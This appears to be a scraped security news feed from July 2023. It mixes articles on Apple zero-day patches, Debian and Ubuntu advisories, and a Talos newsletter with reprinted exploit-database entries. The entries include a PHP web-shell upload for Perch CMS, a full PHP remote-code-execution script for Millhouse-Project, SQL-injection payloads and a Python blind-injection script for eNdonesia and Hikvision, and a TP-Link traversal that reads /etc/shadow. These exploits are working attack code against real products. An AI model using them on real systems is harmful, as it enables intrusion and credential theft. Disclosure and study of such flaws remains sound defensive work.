Apple has rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and Safari to address several security vulnerabilities, including one actively exploited zero-day bug in the wild.
Tracked as CVE-2023-38606, the shortcoming resides in the kernel and permits a malicious app to modify sensitive kernel state potentially. The company said it was addressed with improved state management.
"

Endpoint Security / Zero Day

Apple has rolled out security updates to iOS, iPadOS, macOS, tvOS, watchOS, and Safari to address several security vulnerabilities, including one actively exploited zero-day bug in the wild.

Tracked as **CVE-2023-38606**, the shortcoming resides in the kernel and permits a malicious app to modify sensitive kernel state potentially. The company said it was addressed with improved state management.

"Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1," the tech giant noted in its advisory.

It's worth noting that CVE-2023-38606 is the third security vulnerability discovered in connection with Operation Triangulation, a sophisticated mobile cyber espionage campaign targeting iOS devices since 2019 using a zero-click exploit chain. The other two zero-days, CVE-2023-32434 and CVE-2023-32435, were patched by Apple last month.

Kaspersky researchers Valentin Pashkov, Mikhail Vinogradov, Georgy Kucherin, Leonid Bezvershenko, and Boris Larin have been credited with discovering and reporting the flaw.

The updates are available for the following devices and operating systems -

*   iOS 16.6 and iPadOS 16.6 - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
*   iOS 15.7.8 and iPadOS 15.7.8 - iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)
*   macOS Ventura 13.5, macOS Monterey 12.6.8, and macOS Big Sur 11.7.9
*   tvOS 16.6 - Apple TV 4K (all models) and Apple TV HD, and
*   watchOS 9.6 \- Apple Watch Series 4 and later

With the latest round of patches, Apple has resolved a total of 11 zero-days impacting its software since the start of 2023. It also comes two weeks after the company published emergency fixes for a remote code execution bug in WebKit that could lead to arbitrary code execution (CVE-2023-37450).

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Rolls Out Urgent Patches for Zero-Day Flaws Impacting iPhones, iPads and Macs

Categories: Exploits and vulnerabilities
Categories: News
Tags: Apple

Tags:  WebKit

Tags:  CVE-2023-38606

Tags:  CVE-2023-32409

Tags:  CVE-2023-37450

Tags:  CVE-2023-32416

Apple has released security updates for several products to address several serious vulnerabilities including some actively exploited zero-days.



(Read more...)




The post Update now! Apple fixes several serious vulnerabilities appeared first on Malwarebytes Labs.

Apple has released security updates for several products to address several serious vulnerabilities  including some actively exploited zero-days. Updates are available for these products:

 Safari 16.6

 macOS Big Sur and macOS Monterey

 iOS 16.6 and iPadOS 16.6

 iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

 iOS 15.7.8 and iPadOS 15.7.8 

 iPhone 6s (all models), iPhone 7 (all models), iPhone SE (1st generation), iPad Air 2, iPad mini (4th generation), and iPod touch (7th generation)

 macOS Ventura 13.5

 macOS Ventura

 macOS Monterey 12.6.8

 macOS Monterey

 macOS Big Sur 11.7.9

 macOS Big Sur

 tvOS 16.6

 Apple TV 4K (all models) and Apple TV HD

 watchOS 9.6

 Apple Watch Series 4 and later

The updates may already have reached you in your regular update routines, but it doesn't hurt to check if your device is at the latest update level. If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS.

How to update your iPhone or iPad.

How to update macOS on Mac.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. Some of the notable CVEs patched in these updates are:

CVE-2023-38606: A vulnerability in the kernel that may allow an app to modify sensitive kernel state. Apple is aware of a report that this issue may have been actively exploited against versions of iOS released before iOS 15.7.1. The exploitation of this vulnerability took place as part of a 0-click exploit chain used to install spyware. These exploitation methods are named like that because they require no user interaction to compromise a device.

CVE-2023-32409: a vulnerability in the WebKit. A remote attacker may be able to break out of Web Content sandbox. Apple is aware of a report that this issue may have been actively exploited. A patch for this vulnerability was issued in May for iOS 16 and iPadOS 16, but is now also available for iOS 15.7.8 and iPadOS 15.7.8.

WebKit is the engine that powers the Safari web browser on Macs as well as all browsers on iOS and iPadOS (all web browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux.

CVE-2023-37450: Another WebKit vulnerability where processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited. This vulnerability has been covered by a Rapid Security Response (RSR) earlier because Apple was aware of a report that this issue may have been actively exploited.

CVE-2023-32416: a vulnerability in the Find My app which could allow another app to read sensitive location information. This issue was addressed with improved restrictions.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Update now! Apple fixes several serious vulnerabilities

Debian Linux Security Advisory 5457-1 - An anonymous researcher discovered that processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5457-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
July 22, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-37450

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-37450

    An anonymous researcher discovered that processing web content may  
    lead to arbitrary code execution. Apple is aware of a report that  
    this issue may have been actively exploited.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 2.40.3-2~deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 2.40.3-2~deb12u2.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmS7l4cACgkQAAyEYu0C  
2AJr/BAAnyKHOHxiOroDoQHyo/DrX4rS7UTRb3TQKmgxxlehEAm40lO7jMTG1HLD  
HW8v7Jk9dguaqD4pV09rR3lfFrHb24jzyPZs07sQ3m1c9JQUXJybcsCkbLZlXH/V  
BHiv/oUjLK6FW4lHzhx3YjJ1kw9V9w5VO1neTjP4N9PK9TSGmZyPeHFlWG/Rq9fN  
jDU2PdS48TZK3enBfGEcaKOUcdxUsqWIIRh8nJY1EXVXUpmujjb8oJEHltNlSoe7  
NGmaWsPmpRz71JYkFVzRRwcxqa1UEi4abMy9VHzPgcGomLXESbDhlZYGLPMmhV5s  
lV6w73j1qDTpDZrsB7klm/MoABkqED6gwg1GktwmOFC07hC2PQt1Kd5ubQGX041k  
0XCKf+JavPDsYgN2FV9BsuOvDXJX2hf21jcgw/M7nX0byVEpG+rZrzdecEPMND8I  
+v0Lugs8D+Zg/80QaVqhA1hTQcwJgZVDn2GhB+8GfB4i0zhERHugkQsjCMIgkeh3  
XQw8dXixJNCCG3S6G63lJaRgKyw2lDlG1yYuEgQlXvxsopIHc9Itt71sPgTd5Fsk  
nvXiwMRkuqmytbOIcfaaIqPAe146l6O22sGICeYU59GdoEWcSstQCO6Gd1PJDJ8I  
8h4IFTwxPGbVq5WIyX8mogK/n8FTPb788HrYcK/NLcCu5Kh23xY=  
=g6Fh  
-----END PGP SIGNATURE-----

Debian Security Advisory 5457-1

Perch version 3.2 suffers from a remote code execution vulnerability.

    Exploit Title: Perch v3.2 - Remote Code Execution (RCE)Application: Perch CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://grabaperch.com/Software Link: https://grabaperch.com/downloadDate of found: 21.07.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit assets (http://localhost/perch_v3.2/perch/core/apps/assets/)3. add assets (http://localhost/perch_v3.2/perch/core/apps/assets/edit/)4. upload poc.phar filepoc.phar file contents :<?php $a=$_GET['code']; echo system($a);?>5. visit  http://localhost/perch_v3.2/perch/resources/admin/poc.phar?code=cat%20/etc/passwdpoc request: POST /perch_v3.2/perch/core/apps/assets/edit/ HTTP/1.1Host: localhostContent-Length: 1071Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryYGoerZn09hHSjd4ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/perch_v3.2/perch/core/apps/assets/edit/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: phpwcmsBELang=en; cmsa=1; PHPSESSID=689rdj63voor49dcfm9rdpolc9Connection: close------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceTitle"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image"; filename="poc.phar"Content-Type: application/octet-stream<?php $a=$_GET['code']; echo system($a);?>------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_field"1------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="image_assetID"------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="resourceBucket"admin------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="tags"test------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="btnsubmit"Submit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="formaction"edit------WebKitFormBoundaryYGoerZn09hHSjd4ZContent-Disposition: form-data; name="token"5494af3e8dbe5ac399ca7f12219cfe82------WebKitFormBoundaryYGoerZn09hHSjd4Z--

Perch 3.2 Remote Code Execution

Ubuntu Security Notice 6232-1 - It was discovered that wkhtmltopdf was not properly enforcing the same-origin policy when processing certain HTML files. If a user or automated system using wkhtmltopdf were tricked into processing a specially crafted HTML file, an attacker could possibly use this issue to expose sensitive information.

==========================================================================  
Ubuntu Security Notice USN-6232-1  
July 20, 2023

wkhtmltopdf vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

wkhtmltopdf could be made to expose sensitive information if it opened a  
specially crafted file.

Software Description:  
- wkhtmltopdf: Command line utility to convert html to pdf using WebKit

Details:

It was discovered that wkhtmltopdf was not properly enforcing the  
same-origin policy when processing certain HTML files. If a user or  
automated system using wkhtmltopdf were tricked into processing a  
specially crafted HTML file, an attacker could possibly use this issue to  
expose sensitive information.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
wkhtmltopdf 0.12.5-1ubuntu0.1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.12.4-1ubuntu0.1~esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.12.2.4-1ubuntu0.1~esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
wkhtmltopdf 0.9.9-4ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
https://ubuntu.com/security/notices/USN-6232-1  
CVE-2020-21365

Package Information:  
https://launchpad.net/ubuntu/+source/wkhtmltopdf/0.12.5-1ubuntu0.1

Ubuntu Security Notice USN-6232-1

SQL injection vulnerability in diskusi.php in eNdonesia 8.7, allows an attacker to execute arbitrary SQL commands via the "rid=" parameter.

**Name already in use**

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

**1** branch **0** tags

Code

*   Use Git or checkout with SVN using the web URL.
    
*   Open with GitHub Desktop
*   Download ZIP

**Latest commit**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

Proof of Concept for CVE-2023-31753

Description: A SQL Injection vulnerability was discovered in eNdonesia Portal v8.7 which is exploited upon inserting crafted payload into "rid" parameter in diskusi.php.

*   Exploit Title: eNdonesia Portal 8.7 - SQL injection vulnerability in diskusi.php (rid parameter)
*   Date: May 19, 2023
*   Exploit Author: Kunal Khubchandani
*   Vendor Homepage: http://www.endonesia.org/
*   Software Link: https://sourceforge.net/projects/endonesia/
*   Version: 8.7
*   Category: Webapps
*   Tested on: WiN11\_x64/KaLiLinuX\_x64
*   CVE : CVE-2023-31753

#POC:

1.  To exploit this vulnerability, one must send a SQLi sleep payload as a value of "rid" GET Parameter in the following HTTP request.
    
2.  Vulnerable Request:
    

GET /endonesia.8.7.en/mod.php?mod=diskusi&op=delres&rid=(select\*from(select(sleep(20)))a) HTTP/1.1  
Host: TARGET  
Accept-Encoding: gzip, deflate  
Accept: _/_  
Accept-Language: en-US;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  

3.  Upon sending the above http request through Burp Suite, the user will receive a response with a 20 seconds delay.

\*\* 20 Seconds Delay:

\*\* 30 Seconds Delay:

CVE-2023-31753: GitHub - khmk2k/CVE-2023-31753: Proof of Concept for CVE-2023-31753 - eNdonesia Portal 8.7

Millhouse-Project v1.414 was discovered to contain a remote code execution (RCE) vulnerability via the component /add_post_sql.php.

    <?php
    /*
    Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code Execution
    Date: 12/05/2023
    Exploit Author: Chokri Hammedi
    Vendor Homepage: https://github.com/thrsrossi/Millhouse-Project
    Software Link: https://github.com/thrsrossi/Millhouse-Project.git
    Version: 1.414
    Tested on: Debian
    CVE: N/A
    */
    
    
    $options = getopt('u:c:');
    
    if(!isset($options['u'], $options['c']))
    die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi
    \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
    \033[0m\n
    \n");
    
    $target     =  $options['u'];
    
    $command    =  $options['c'];
    
    $url = $target . '/includes/add_post_sql.php';
    
    
    $post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="title"
    
    helloworld
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="description"
    
    <p>sdsdsds</p>
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="files"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="category"
    
    1
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8
    Content-Disposition: form-data; name="image"; filename="rose.php"
    Content-Type: application/x-php
    
    <?php
    $shell = shell_exec("' . $command . '");
    echo $shell;
    ?>
    
    ------WebKitFormBoundaryzlHN0BEvvaJsDgh8--
    ';
    
    $headers = array(
        'Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',
        'Cookie: PHPSESSID=rose1337',
    );
    
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, true);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // execute command
    
    $shell = "{$target}/images/rose.php?cmd=" . urlencode($command);
    $ch = curl_init($shell);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $exec_shell = curl_exec($ch);
    curl_close($ch);
    echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";
    
    ?>

CVE-2023-37165: OffSec’s Exploit Database Archive

Last week, the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S.’s critical infrastructure security (and more).

Thursday, July 20, 2023 14:07

Welcome to this week’s edition of the Threat Source newsletter.

Last week, the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S.’s critical infrastructure security (and more).

The roadmap goes a long way toward actualizing a plan the administration released earlier this year and sets tangible goals and programs to put many of these initiatives into action. But because nothing ever moves quickly in government, this roadmap and the associated plan are already hitting a few roadblocks.

First, there’s the ever-present partisan politics. Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys. To me, simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non-issue, but the U.S. Appeals Court has put a hold on this rule for the time being (though it didn’t give a precise reason at the time of its ruling).

If lawmakers are going to hash these types of regulations in court every time something new pops up, we’ll never reach the point of these rules actually being implemented.

Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap, saying they would use their respective House panels to, “exercise strict oversight on CISA’s efforts” to implement many of the policies outlined.

Regardless of which side of the political spectrum you fall, cybersecurity should be something our lawmakers can all agree on.

Say these arguments extend through the 2024 election — what happens if control of the White House or Congress switches between parties? And then that changes again in 2026? Change is slow, so none of these initiatives are going to be implemented overnight.

If our government can’t come to any sort of agreement about the importance of cybersecurity, and how to encourage stronger public-private partnerships to reach the country’s goals, this is just going to be another partisan issue that’s held up by legal challenges, budget negotiations, hearings and verbal discourse. And by the time that all subsides, the people in charge of outlining and implementing these cybersecurity goals could have very well changed.

So, forgive me if I’m coming off as a bit skeptical that anything in this roadmap will end up passing any mile markers.

**The one big thing**

Our researchers recently discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland. Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access. The activity we analyzed occurred as early as April 2022 and as recently as earlier this month, demonstrating the persistent nature of the threat actor. The final payloads include the AgentTesla remote access trojan (RAT), Cobalt Strike beacons and njRAT.

**Why do I care?**

If you’re a user in Ukraine or Poland, especially someone working in the government or military sectors, this is a clear-cut example of a spam campaign targeting this population. For those who fall outside of that demographic, it’s interesting that this group is still relying on the user enabling macros in Office, since Microsoft disabled those by default earlier this year. These are also highly targeted emails with (relatively speaking) convincing lures, so whoever is behind these is not to be ignored.

**So now what?**

There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns. Other Snort rules and detection content can prevent the execution of the malware used as the final payload. Our researchers have also published examples of the types of lure images and documents used in the initial phishing emails so users can know what to be on the lookout for.

**Top security headlines of the week**

**Chinese state-sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies,** including the State Department. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a detailed timeline on the campaign, stating that an investigation from Microsoft revealed that “advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data” after users reported suspicious activities in their Microsoft 365 cloud environment. While the full scope of the hack is still under investigation, reports indicate that the actors were primarily trying to steal sensitive information. While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited, the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users. “Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse,” the report states. (CISA, CNN)

Popular tax preparation software companies are under fire from lawmakers for **allegedly sharing personal information with social media sites, including Google and Meta.** Several Democratic lawmakers released a report last week that accused TaxAct, H&R Block and TaxSlayer of embedding Meta and Google’s tracking pixels on their sites, potentially violating U.S. law and sharing taxpayers’ information with those companies. The report says the data was kept anonymous, but the companies could “easily” use the information to identify individuals or create targeted advertising for them. The report has also renewed calls for the Internal Revenue Service to offer its own, free online tax filing service for U.S. consumers. (Vox, USA Today)

**Apple had to roll back and then re-release a security update** that addressed an actively exploited vulnerability in WebKit. Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023-37450, a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use. However, users reported that the fix was causing Safari to not connect correctly to major websites like Facebook, Instagram and Zoom, leading Apple to pull back the patch. Since then, Apple released a new fix for iOS, iPadOS and macOS that reliably fixes the vulnerability again. Though few details are currently available about CVE-2023-37450, Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content. (Forbes, Gizmodo)

**Can’t get enough Talos?**

*   Vulnerability Roundup: Memory corruption vulnerability in Microsoft Edge; MilesightVPN and router could be taken over
*   Malicious Microsoft Drivers Could Number in the Thousands: Cisco Talos
*   New Threat Actor Launches Cyber-attacks on Ukraine and Poland
*   Uncovering weaknesses in Apple macOS and VMWare vCenter: 12 vulnerabilities in RPC implementation
*   The Need to Know: Why are there so many malware-as-a-service offerings?
*   Implementing an ISO-compliant threat intelligence program
*   Talos Takes Ep. #147: The dangers of "Mercenary" groups and the spyware they create

**Upcoming events where you can find Talos**

**BlackHat (Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

_**“Most prevalent malware files” is taking a break this week for maintenance.**_

The federal government’s cybersecurity policies are falling into place just in time to be stalled again

Hikvision Hybrid SAN Ds-a71024 firmware suffers from a remote blind SQL injection vulnerability.

    # Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution# Date: 16  July 2023# Exploit Author: Thurein Soe# CVE : CVE-2022-28171# Vendor Homepage: https://www.hikvision.com# Software Link: N/A# Refence Link: https://cve.report/CVE-2022-28171# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s'''Vendor Description:Hikvision is a world-leading surveillance manufacturer and supplier ofvideo surveillance and Internet of Things (IoT) equipment for civilian andmilitary purposes.Some Hikvision Hybrid SAN products were vulnerable to multiple remote codeexecution vulnerabilities such as command injection, Blind SQL injection,HTTP request smuggling, and reflected cross-site scripting.This resulted in remote code execution that allows an adversary to executearbitrary operating system commands and more. However, an adversary must beon the same network to leverage this vulnerability to execute arbitrarycommands.Vulnerability description:A manual test confirmed that The download type parameter was vulnerable toBlind SQL injection.I created a Python script to automate and enumerate SQLversions as the Application was behind the firewall and block all therequests from SQLmap.Request Body:GET/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'HTTP/1.1Host: X.X.X.X.12:2004Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36Connection: closePOC:'''import requestsimport timeurl = "http://X.X.X.X:2004/web/log/dynamic_log.php"# Function to check if the response time is greater than the specified delaydef is_response_time_delayed(response_time, delay):    return response_time >= delay# Function to perform blind SQL injection and check the response timedef perform_blind_sql_injection(payload):    proxies = {        'http': 'http://localhost:8080',        'https': 'http://localhost:8080',    }    params = {        'target': 'makeMaintainLog',        'downloadtype': payload    }    headers = {        'Accept-Encoding': 'gzip, deflate',        'Accept': '*/*',        'Accept-Language': 'en',        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',        'Connection': 'close'    }    start_time = time.time()    response = requests.get(url, headers=headers, params=params,proxies=proxies)    end_time = time.time()    response_time = end_time - start_time    return is_response_time_delayed(response_time, 20)# Enumerate the MySQL versiondef enumerate_mysql_version():    version_Name = ''    sleep_time = 10  # Sleep time is 10 seconds    payloads = [        f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},SLEEP({sleep_time}), 0))-- -"        for i in range(1, 11)        for mid in range(256)    ]    for payload in payloads:        if perform_blind_sql_injection(payload):            mid = payload.split("=")[-1].split(",")[0]            version_Name += chr(int(mid))    return version_Name# Enumeration is completedversion_Name = enumerate_mysql_version()print("MySQL version is:", version_Name)

Hikvision Hybrid SAN Ds-a71024 SQL Injection

TP-Link TL-WR740N suffers from a directory traversal vulnerability.

# Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal# Date: 13/7/2023# Exploit Author: Anish Feroz (Zeroxinn)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N---------------------------POC---------------------------Request-------GET /help/../../../etc/shadow HTTP/1.1Host: 192.168.0.1:8082Authorization: Basic YWRtaW46YWRtaW4=Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeResponse--------HTTP/1.1 200 OKServer: Router WebserverConnection: closeWWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Router WR740N"Content-Type: text/html<META http-equiv=Content-Type content="text/html; charset=iso-8859-1"><HTML><HEAD><TITLE>TL-WR740N</TITLE><META http-equiv=Pragma content=no-cache><META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT"><LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css"><SCRIPT language="javascript" type="text/javascript"></SCRIPT>root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::bin::10933:0:99999:7:::daemon::10933:0:99999:7:::adm::10933:0:99999:7:::lp:*:10933:0:99999:7:::sync:*:10933:0:99999:7:::shutdown:*:10933:0:99999:7:::halt:*:10933:0:99999:7:::uucp:*:10933:0:99999:7:::operator:*:10933:0:99999:7:::nobody::10933:0:99999:7:::ap71::10933:0:99999:7:::

Tag

#webkit